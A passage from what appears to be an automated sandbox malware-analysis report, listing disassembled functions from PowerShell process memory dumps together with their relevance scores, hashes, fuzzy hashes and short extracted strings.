                                                                                                    • Instruction ID: 732ea9e75b558554c1a67a9f78842e56a074329f46ccd1f838462aff2281f769
                                                                                                    • Opcode Fuzzy Hash: 53e059868f0aec88c77a9c72aa2b05c97d429050475db6ecbc688cadd1a39eea
                                                                                                    • Instruction Fuzzy Hash: 0DE1E730A09A8D8FEBA8DF68C8657E977D1FF58310F04426ED84DC7295DF78A9418B81
                                                                                                    Function 00007FFD9B974049 Relevance: .7, Instructions: 690COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2193534742.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7a549924170a3c63bccb26fdee73457b3b559a601fd5c6615da4b561722c9ea1
                                                                                                    • Instruction ID: 19af98dbd8178c78eedb6ed6e8a1648f6aeb9bb40154234fef767110c660a7de
                                                                                                    • Opcode Fuzzy Hash: 7a549924170a3c63bccb26fdee73457b3b559a601fd5c6615da4b561722c9ea1
                                                                                                    • Instruction Fuzzy Hash: 73225B21B1F7CA1FE766D76848B56687BE0EF56210B1901FFD09DC72E3DA185905C341
                                                                                                    Function 00007FFD9B97522D Relevance: .4, Instructions: 391COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2193534742.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: fc6457cdba2d1b07adf2d6fb88185e94a46fe808604c56add35716c62a3c79c4
                                                                                                    • Instruction ID: 305d70250abe92db87ef2c3c09bb632ffc9fa6b1173349a4500519d51c04775e
                                                                                                    • Opcode Fuzzy Hash: fc6457cdba2d1b07adf2d6fb88185e94a46fe808604c56add35716c62a3c79c4
                                                                                                    • Instruction Fuzzy Hash: 8EB13422B1FA8E5FEBE5DB6848A55B87BD1EF55220B1901BBD04DCB1F3DA18AD018341
                                                                                                    Function 00007FFD9B8AC020 Relevance: .3, Instructions: 279COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2192769471.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 72660072d8cc71cbf7b1070c509bf03f512d53eb8babb4542e8995d20984bdb4
                                                                                                    • Instruction ID: 5c73bc14ed3b212c6e20ccb881cde0f4e8c97709293c244e722bcc5d7c15e5c1
                                                                                                    • Opcode Fuzzy Hash: 72660072d8cc71cbf7b1070c509bf03f512d53eb8babb4542e8995d20984bdb4
                                                                                                    • Instruction Fuzzy Hash: A6814B3071CA494FDB99EB5CC8A4AB5B7E1FF99350B1005BDD08AC72A6DA25F842CB40
                                                                                                    Function 00007FFD9B9741E7 Relevance: .2, Instructions: 156COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2193534742.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 68a2c2ca3b9f8f932dbd2c691fcfd118cd6f8641a471769b8b750b1de7cd26e7
                                                                                                    • Instruction ID: 0b24bf90e0c9f22d23b84bc6cdfad24da1ddc237151eaf0e729fa7028f04f958
                                                                                                    • Opcode Fuzzy Hash: 68a2c2ca3b9f8f932dbd2c691fcfd118cd6f8641a471769b8b750b1de7cd26e7
                                                                                                    • Instruction Fuzzy Hash: C651E162B2FA8A1FE7A5D66848B17BC67D1EF51350B5A00BED06DC72E3DD18A8008301
                                                                                                    Function 00007FFD9B975352 Relevance: .1, Instructions: 112COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2193534742.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0294e1e9408492469c18d3dce5ae33f7717746da61d7335b2794c169a3524b06
                                                                                                    • Instruction ID: b67a65ad3f77425dba6df81ebcb8e760bf9511ba69f2f5c80e2bed5e8d51d5c7
                                                                                                    • Opcode Fuzzy Hash: 0294e1e9408492469c18d3dce5ae33f7717746da61d7335b2794c169a3524b06
                                                                                                    • Instruction Fuzzy Hash: D8310812F2FACA5BF7F5975818B617867C1EF50664F6901BAD45DCB1F2ED0C6C004242
                                                                                                    Function 00007FFD9B8A3945 Relevance: .0, Instructions: 49COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2192769471.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                    • Instruction ID: 04b822a5e3d45822b76be075df3c081dc68bfd048355e8304278f52f19c5101e
                                                                                                    • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                    • Instruction Fuzzy Hash: F401677121CB0D4FD748EF0CE451AA5B7E0FB99364F10056DE58AC36A5D636E881CB45

                                                                                                    Non-executed Functions

                                                                                                    Function 00007FFD9B8A0D35 Relevance: .5, Instructions: 539COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2192769471.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e6415cb9a47e564a4e54c934c54b3c2b385bf31bb1792a84ca8572ed13d1854e
                                                                                                    • Instruction ID: 0c20d8b19affde8ee36161fef7b01aee6081cb81812c7bf928cdcf9b4b6777b4
                                                                                                    • Opcode Fuzzy Hash: e6415cb9a47e564a4e54c934c54b3c2b385bf31bb1792a84ca8572ed13d1854e
                                                                                                    • Instruction Fuzzy Hash: 16F1E557B0F6DA4FE733A7A91CB50A57F50EF2725470E01FBC4D88A0E39D196A06C262

                                                                                                    Executed Functions

                                                                                                    Function 07B449B0 Relevance: 6.5, Strings: 5, Instructions: 275COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fwl$(fwl$(fwl$(fwl$x.hk
                                                                                                    • API String ID: 0-1339419433
                                                                                                    • Opcode ID: 8feb858f48a93aafe2979748fe77bd223f9097caf876c71093be62b45c65cbcc
                                                                                                    • Instruction ID: 72db792a5203c1e653ef9f4cad450678f19a29449d99110100eb78ebd81af3be
                                                                                                    • Opcode Fuzzy Hash: 8feb858f48a93aafe2979748fe77bd223f9097caf876c71093be62b45c65cbcc
                                                                                                    • Instruction Fuzzy Hash: 13B192F4B001049FEB24DBA8C655BAAB7E3EF84304F1480A9E901AF755CB71EC51DBA5
                                                                                                    Function 07B458E0 Relevance: 26.1, Strings: 20, Instructions: 1076COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$tPfq$tPfq$x.hk$x.hk$-hk$-hk
                                                                                                    • API String ID: 0-2167855781
                                                                                                    • Opcode ID: 842a0bd7059afe549730518567574c2c50683d43b6f153af392a6ea48c32ef7b
                                                                                                    • Instruction ID: 1a0f894f743f3481493cd8b9ba7c1749eb1e34bca6be07c1dfaf279579748fad
                                                                                                    • Opcode Fuzzy Hash: 842a0bd7059afe549730518567574c2c50683d43b6f153af392a6ea48c32ef7b
                                                                                                    • Instruction Fuzzy Hash: 4A92D3F0A00209CFDB24DFA8C950B9ABBB2EF85314F1484AAD5059F751CB31ED85DBA1
                                                                                                    Function 07B4B225 Relevance: 22.0, Strings: 17, Instructions: 704COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$x.hk$x.hk$x.hk$-hk$-hk
                                                                                                    • API String ID: 0-497940369
                                                                                                    • Opcode ID: 086a3569fb8034f6e848b85e89b17e1108295cf311c50978ca64848d0b39ebf2
                                                                                                    • Instruction ID: 2903d32d05e91a7b53d9d02fd56efd8b97d4294c5ea9ee63096d806f97ee1ffb
                                                                                                    • Opcode Fuzzy Hash: 086a3569fb8034f6e848b85e89b17e1108295cf311c50978ca64848d0b39ebf2
                                                                                                    • Instruction Fuzzy Hash: 6F624FB4A002189FDB64DB68C955BDEBBB2FF84700F1080E9D5096B791CB75AE81CF91
                                                                                                    Function 07B4E150 Relevance: 15.5, Strings: 12, Instructions: 527COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fwl$(fwl$4'fq$4'fq$tPfq$tPfq$$fq$$fq$$fq$$fq$$fq$$fq
                                                                                                    • API String ID: 0-875421214
                                                                                                    • Opcode ID: 8e187a45542f6510dcd48bd797bc1b51eef7576b4404e76a251b0e208b6e713e
                                                                                                    • Instruction ID: ac9f2734138521af529233bc94f7be96ba3db55e0ed0751178d224212d0f2e9a
                                                                                                    • Opcode Fuzzy Hash: 8e187a45542f6510dcd48bd797bc1b51eef7576b4404e76a251b0e208b6e713e
                                                                                                    • Instruction Fuzzy Hash: 9C12B1F5B00215DFEB25CB68C541AAABBF2FF89310F1480AAD9059B751DB32DC41DBA1
                                                                                                    Function 07B44DB8 Relevance: 10.7, Strings: 8, Instructions: 741COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl
                                                                                                    • API String ID: 0-519931695
                                                                                                    • Opcode ID: 7f21ac04f4f70cb9d5afb8c48a418dbc7f6052b549dffdc29f68fd0710d142ff
                                                                                                    • Instruction ID: 59a01c80b0c151b2c136fd237d6977cc0c44bf77b33f4d2d55aff6d54ae70420
                                                                                                    • Opcode Fuzzy Hash: 7f21ac04f4f70cb9d5afb8c48a418dbc7f6052b549dffdc29f68fd0710d142ff
                                                                                                    • Instruction Fuzzy Hash: 89627AB4A00205DFDB24CB98C551AAABBB2FF88304F24C0A9D9099F755CB72ED45DF91
                                                                                                    Function 07B462F3 Relevance: 9.1, Strings: 7, Instructions: 387COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fwl$(fwl$4'fq$4'fq$x.hk$x.hk$-hk
                                                                                                    • API String ID: 0-1521981089
                                                                                                    • Opcode ID: 5672619bda13c67fc685b58fdd34a27ae9951959c659ee027b2f0a18618eb2a3
                                                                                                    • Instruction ID: a86948576f141778974c4366f14c52d3e2ee4bdbc2e5ac6c1a6d1e9447a385b4
                                                                                                    • Opcode Fuzzy Hash: 5672619bda13c67fc685b58fdd34a27ae9951959c659ee027b2f0a18618eb2a3
                                                                                                    • Instruction Fuzzy Hash: 0CF1A5F0A002159FDB24DB68C951F9ABBB3EF84304F10C499D509AF795CB71AD858FA1
                                                                                                    Function 07B468C0 Relevance: 7.9, Strings: 6, Instructions: 440COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fwl$4'fq$4'fq$4'fq$x.hk$-hk
                                                                                                    • API String ID: 0-2143175891
                                                                                                    • Opcode ID: 5f4f639f044533dea0f1b2924033df98f7b3ae702fb6ec5b9bee90d70d2dbe5d
                                                                                                    • Instruction ID: 9af9a126668a554a1a9de002e2d66ccc6a7beebad2afaa61fa087c35fbcfe74a
                                                                                                    • Opcode Fuzzy Hash: 5f4f639f044533dea0f1b2924033df98f7b3ae702fb6ec5b9bee90d70d2dbe5d
                                                                                                    • Instruction Fuzzy Hash: 0C02C0F0A002049FDB24DF58C951B9ABBB2EF85314F15C499E509AF351CB71EC86CBA1
                                                                                                    Function 07B4C659 Relevance: 7.9, Strings: 6, Instructions: 397COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fwl$(fwl$4'fq$4'fq$x.hk$x.hk
                                                                                                    • API String ID: 0-792651079
                                                                                                    • Opcode ID: f75b36b58848796da7a753d58cc55cf303d3085921f884e2636ec91779d3354a
                                                                                                    • Instruction ID: 4aaee69ae9bac031285ee79ab1633856c446845f279630e64a0919a458a2a59b
                                                                                                    • Opcode Fuzzy Hash: f75b36b58848796da7a753d58cc55cf303d3085921f884e2636ec91779d3354a
                                                                                                    • Instruction Fuzzy Hash: 39023DB4A00259DFDB64DB68C954BEDBBB2FB44700F1080E5D909AB741CB71AE81DFA1
                                                                                                    Function 07B4B948 Relevance: 7.9, Strings: 6, Instructions: 363COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fwl$4'fq$4'fq$x.hk$x.hk$-hk
                                                                                                    • API String ID: 0-3310609394
                                                                                                    • Opcode ID: 25e0d64672a55c0e3f5794bed03b19e2fece79759202ae978781d9e67396e1c7
                                                                                                    • Instruction ID: c074d3083f23df95a61066c091662c8bb2a725c6ae6c9cf3e5a3ba60ed6b8c8d
                                                                                                    • Opcode Fuzzy Hash: 25e0d64672a55c0e3f5794bed03b19e2fece79759202ae978781d9e67396e1c7
                                                                                                    • Instruction Fuzzy Hash: 6CE161B4A002189FDB24DB68C955B9EBBE2FF84700F1084D9D6099F795CB71ED818FA1
                                                                                                    Function 07B40638 Relevance: 7.8, Strings: 6, Instructions: 332COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'fq$4'fq$$fq$$fq$$fq$$fq
                                                                                                    • API String ID: 0-1793556278
                                                                                                    • Opcode ID: 115169db2225ba236f4891367588808277f11e58ea6804aa6b096c8b46664304
                                                                                                    • Instruction ID: 0de1e8013523a41a46312bcbf5461a3ed7a2be27b5fd56e76a8cb5422d32d8ac
                                                                                                    • Opcode Fuzzy Hash: 115169db2225ba236f4891367588808277f11e58ea6804aa6b096c8b46664304
                                                                                                    • Instruction Fuzzy Hash: 10B13EF2B04216DFEB14AB68D94567BBBA6EFC1310F1480EED605CB651DB31C841DBA2
                                                                                                    Function 07B46C58 Relevance: 6.5, Strings: 5, Instructions: 257COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'fq$4'fq$4'fq$x.hk$-hk
                                                                                                    • API String ID: 0-3764169586
                                                                                                    • Opcode ID: 3efc7a49256d4886275f44b11d84093d341662f2d32b5382cb23d1d87f42642e
                                                                                                    • Instruction ID: eea4bb08d4ad9f5e300e67c5295cf5a3a61c42efe5b028deca0224396b2ab9fa
                                                                                                    • Opcode Fuzzy Hash: 3efc7a49256d4886275f44b11d84093d341662f2d32b5382cb23d1d87f42642e
                                                                                                    • Instruction Fuzzy Hash: 02A19AF0A002059FDB28DF98C540B9EBBB2EF88314F14C499E9046F755CB76E845DBA1
                                                                                                    Function 07B42C08 Relevance: 6.5, Strings: 5, Instructions: 206COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'fq$4'fq$$fq$$fq$$fq
                                                                                                    • API String ID: 0-3759051638
                                                                                                    • Opcode ID: 59c742a593b19217745e056d8af2e79ce6bc9dc5013259cdab9f765d1452e6da
                                                                                                    • Instruction ID: a568a638c52f05bf5aabfb4342509b85e925b05c3d6153bf8e53c121ffdecd1d
                                                                                                    • Opcode Fuzzy Hash: 59c742a593b19217745e056d8af2e79ce6bc9dc5013259cdab9f765d1452e6da
                                                                                                    • Instruction Fuzzy Hash: 076108F1605345DFEF258B68C8517E67BB5FF86350F18C0EAE8048B292DA35D841E761
                                                                                                    Function 07B44D9B Relevance: 4.3, Strings: 3, Instructions: 553COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fwl$(fwl$(fwl
                                                                                                    • API String ID: 0-2374567490
                                                                                                    • Opcode ID: 28e34d837bdca9a81f40f284ce42b09a1ba7c43d7d73a706d31dadf7575eccdd
                                                                                                    • Instruction ID: a59962c96022ef29e2eaea72a6df6f633f6da22c5124f777b9b25da73d37354a
                                                                                                    • Opcode Fuzzy Hash: 28e34d837bdca9a81f40f284ce42b09a1ba7c43d7d73a706d31dadf7575eccdd
                                                                                                    • Instruction Fuzzy Hash: 203248B4A00205DFEB24CB98C541A99BBB2FF88314F15C0A9E9099F759CB72ED45CF91
                                                                                                    Function 07B4552D Relevance: 4.2, Strings: 3, Instructions: 483COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fwl$(fwl$(fwl
                                                                                                    • API String ID: 0-2374567490
                                                                                                    • Opcode ID: 2a88271dea92151451b595848e487dbf29583d25bbf55f6a674baac528b97838
                                                                                                    • Instruction ID: 3571eba94ff48893741475024ff1f0cc59dba9a369d6ab70d756cae92df12aed
                                                                                                    • Opcode Fuzzy Hash: 2a88271dea92151451b595848e487dbf29583d25bbf55f6a674baac528b97838
                                                                                                    • Instruction Fuzzy Hash: 801246B4A00205EFEB24CB98C540AA9BBB2FF88304F15C0A9E9099F755CB72ED55DF51
                                                                                                    Function 07B449A6 Relevance: 4.0, Strings: 3, Instructions: 244COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fwl$(fwl$x.hk
                                                                                                    • API String ID: 0-1798524581
                                                                                                    • Opcode ID: 3710fc5fba9db8378f607fe9a2142e460e3510e9c518a3f4f1befc274267ed4e
                                                                                                    • Instruction ID: 74801463e60b5e125d0908b6a5869282cae1f4a3a18d6d2457c843ed11621904
                                                                                                    • Opcode Fuzzy Hash: 3710fc5fba9db8378f607fe9a2142e460e3510e9c518a3f4f1befc274267ed4e
                                                                                                    • Instruction Fuzzy Hash: FCA1A1F4A00245EFEB24DB98C645B9AB7F2FF88310F1480A9E9056B755CB71EC50DBA4
                                                                                                    Function 07B43001 Relevance: 2.6, Strings: 2, Instructions: 136COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 84ul$tPfq
                                                                                                    • API String ID: 0-453248634
                                                                                                    • Opcode ID: 129d6e71c09bb9e9b6f9f51ddda2d6af401e5febb741750b314f76079537e99e
                                                                                                    • Instruction ID: 8aeeb09f0e49b4648ece6a1fde9e8edf6b5a53a728a2c6f717454b7f397984b8
                                                                                                    • Opcode Fuzzy Hash: 129d6e71c09bb9e9b6f9f51ddda2d6af401e5febb741750b314f76079537e99e
                                                                                                    • Instruction Fuzzy Hash: 2351F0B1A093859FE7128B688855B66BFF1EF86214F1DC0DAD4449F293C7319C46C792
                                                                                                    Function 07B40625 Relevance: 2.6, Strings: 2, Instructions: 63COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $fq$$fq
                                                                                                    • API String ID: 0-2537786760
                                                                                                    • Opcode ID: bce08ecd6b82dfaf6bce2e6befdf2ee4285adf8286f72651cc9a0eb9b2e876b8
                                                                                                    • Instruction ID: 4e5e3559bc8e03e562036c8618721493482d1669afe8d04fd6cbf1897f209657
                                                                                                    • Opcode Fuzzy Hash: bce08ecd6b82dfaf6bce2e6befdf2ee4285adf8286f72651cc9a0eb9b2e876b8
                                                                                                    • Instruction Fuzzy Hash: ED11E7F6309246EFEB11AE14D840D62BB75EFC2250B1980DBD645CB152D732C801EB61
                                                                                                    Function 07B408C2 Relevance: 1.5, Strings: 1, Instructions: 252COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $fq
                                                                                                    • API String ID: 0-12477121
                                                                                                    • Opcode ID: feda33f1326c1ad83d88ef5500b5ba14e53d3b797d5e5b3bf9e23477393814ea
                                                                                                    • Instruction ID: 02f38951b09380252f34c322970f35b6f9aa843a27004c780a322b5660018a5d
                                                                                                    • Opcode Fuzzy Hash: feda33f1326c1ad83d88ef5500b5ba14e53d3b797d5e5b3bf9e23477393814ea
                                                                                                    • Instruction Fuzzy Hash: 048159F27043459FEB156A78C85026BBBB5EFC2210F1884EBD644CB652CA35D881DBA1
                                                                                                    Function 07B4E49D Relevance: 1.5, Strings: 1, Instructions: 209COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fwl
                                                                                                    • API String ID: 0-753020189
                                                                                                    • Opcode ID: db3e08b1dd510bef3a455aa2efdf3ac5ea8b1ec23f53ac8896727cf669aa25a4
                                                                                                    • Instruction ID: 9dfd07df2849abdcaef873cc3e639925325ab42031c9dca18f596735a8d23c44
                                                                                                    • Opcode Fuzzy Hash: db3e08b1dd510bef3a455aa2efdf3ac5ea8b1ec23f53ac8896727cf669aa25a4
                                                                                                    • Instruction Fuzzy Hash: 7E8148F5A00205DFEB14CF58C585A99BBB2FF88324F1580A9E905AB355CB32ED41DFA1
                                                                                                    Function 07B4E4B0 Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fwl
                                                                                                    • API String ID: 0-753020189
                                                                                                    • Opcode ID: 5611588f8d90b28136682d1f0413368d42209a36daacf20773d8fb4209ff5e37
